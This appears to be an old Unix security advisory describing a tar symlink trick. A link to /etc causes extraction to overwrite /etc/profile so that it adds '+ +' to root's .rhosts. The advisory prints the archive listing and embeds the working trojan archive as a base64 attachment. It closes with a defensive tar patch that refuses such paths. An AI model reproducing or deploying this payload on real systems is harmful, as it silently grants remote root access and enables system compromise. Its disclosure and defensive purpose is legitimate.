COMMAND

    tar

SYSTEMS AFFECTED

    All systems?

PROBLEM

    Willy  TARREAU  found  following  after  some  prbolems found with
    locate, bash ..., and wondering how tar could be abused.  Although
    this  is  not  a  buffer  overflow  in  a  file  or directory name
    (fortunately), it's  a nasty  way to  make tar  overwrite absolute
    files on disk, (given the user  has access to it).  It's  based on
    the symlinks.

    Here's  an  example  of  a  tar  file  which  will  overwrite your
    /etc/profile to make it add "+  +" to root's .rhosts next time  he
    logs in. So if part  of its directory architecture is  included in
    any package, a root user  could un-tar it to any  location without
    really noticeing that /etc/profile has been rewritten.  Of  course
    it would be simpler with only  two files, one link to /root  and a
    .rhosts,  but  that  becomes  really  evident when you consult the
    file before extracting it.  Note that it could also be interesting
    to write a  key to $ANYUSER/.ssh/authorized_keys!   The output  of
    the tar ztvf gives this:

        $ tar ztvf trojanhorse.tar.gz
        drwxr-xr-x willy/users       0 Sep 21 11:43 1998 Src/
        -rw-r--r-- willy/users      46 Sep 21 11:43 1998 Src/Makefile
        -rw-r--r-- willy/users      17 Sep 21 11:42 1998 Src/dummy.c
        lrwxrwxrwx willy/users       0 Sep 21 11:45 1998 src -> Src
        drwxr-xr-x willy/users       0 Sep 21 11:41 1998 Include/
        -rw-r--r-- willy/users      30 Sep 21 11:41 1998 Include/config.h
        lrwxrwxrwx willy/users       0 Sep 21 11:34 1998 include -> /etc
        -rw-r--r-- willy/users     758 Sep 21 11:40 1998 include/profile
        lrwxrwxrwx willy/users       0 Sep 21 11:53 1998 include -> Include

    The "src" and  "Src" directories are  just here to  make detection
    less evident.  This is the  "include" link to /etc which does  the
    work.  After processing, it's  re-linked to "Include" so when  tar
    ends,  no  trace  is  kept  of  what  has  been  done,  except  in
    /etc/profile.   The  file  comes  here,  mimed.   PLEASE SAVE YOUR
    /etc/profile  before  extracting  it  to  any  place  (/tmp,   for
    example).

    ---
    Content-Type: application/octet-stream; name="trojan.taz"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="trojan.taz"
    Content-MD5: Ce3OCTHse6Qlt7KZvnMw7w==

    H4sICOEiBjYCA3Ryb2phbmhvcnNlLnRhcgDtWF1P2zAUzWv9K+4yJDRQG9ttEo2paDzAqAQD
    LUz76iRC4jYeSVzZCdCX/fbZaUvHNO3joWVafV5ixzfO9T0+vjeJZOI5Kwb0cOj74AAA6fUe
    XOfAAEGASY+EQdDTo5j6gQO+swbUqoolgHPL83z6SzsmlfPfIdL8n8bXbMRztqp3EIyDH3h/
    yL8fLPn3Qz1KQsM/tvyvHE8hrYtiCsV8DyAU5/kear1kSSYMN+4HUUMuFIMnLnIs/kP9Nzug
    kziPpn9KlvqnvtF/gLHV/zrg7cwPACN+2PGsxDcLSiYrfwehOAzDP6n/KCbY6B+HOHSARmtw
    bsP1PyiTvE7ZSr8B/qb+93FT/xFs6/+18p+IcsTHnexR8n93Wf/7VO8FQn2/a/P/mvL/Fx0C
    qARM6griWR2QMWmLgY0An+n/H8n/JAh83NT/ga7/qceqxOp/Hfx7EylW9gvoN+c/6QbL879H
    u+b8D7rEnv/r+f9jRLagH6GnEE1VxQq45SkDVt5wKcqClTo1lCmYWFX1BLT5WMaF0uZHdZlU
    XJSqMYhzHiumYCyAl7Opr2KVyQSh84OL4767ZS57Xq2k956QN4F3xUsXnUek734a1i+HGQzf
    fR4Ot8BFqM55wStoJ/qDoAHiI/gElzyF9ri8hP6sWetmO563dXNc6e0Fn19AlbESteoiVteA
    MUUsV+y+TykacYTeRodv+otp0MnZq9cHp4f9LXMbnR4MTvqudxNLT02EyL0i5rnXjGnvjs+i
    i8b40qzBy4Sqyrhgl+h4EF1Eg4+HfeN10zsanBwu77C7iZAVmECAXjgsJoLFg/D9M2BeB3PH
    wLiE0EhI4PcBnnPXSb2djsrgBaQCtZpIte9giy8j0eroLmrpZaeiZLNgNqvRkZRCVPeWWpTN
    7z93F3Zd2N+Hr2bY60izSGWGkwm009HkgQOzjsjTxWbSdhmLdWjp8x/HYP/hvtOmsoD26Gdz
    zFw5EeIa4gqmopYw9wT22s9cMKxAW8H2B1Fv3zC4YqyELE6uWQpXU13SGIGbybabVRrabd7/
    N/M/JZia7z/aw7r+p4M1OLfh57+FhYWFhYWFhYWFxebgGzr447cAKAAA

    -----

SOLUTION

    This sort of thing is why 'der Mouse' added a key (he picked  "j")
    to his tar to watch for exactly this kind of thing: add j to an  x
    operation and tar will refuse to extract such things.  The comment
    header on the relevant function reads

    /*
     * About to extract a file.  Check that the pathname is free from
     *  certain evil things that do not normally appear in tar archives,
     *  but could, and would be unpleasant.  We walk the path, following
     *  any symlinks that exist in the filesystem (thereby catching
     *  archives that, eg, contain a symlink ./foo->/etc and then a file
     *  ./foo/passwd).  If we follow a symlink to an absolute path, or if
     *  we ever try to ../ up out of our current directory, we print a
     *  complaint and skip the extraction of this archive member.  Also, we
     *  refuse attempts to hard-link to anything other than a plain file.
     *
     * This code is full of potential races, but we aren't trying to
     *  protect against races between tars extracting and other processes
     *  meddling, only against extracting archives that contain evil
     *  things.  The idea is that rather than doing a tar tvf of the
     *  archive and eyeball-scanning for evil things, extract with j and
     *  let tar do the checking.
     */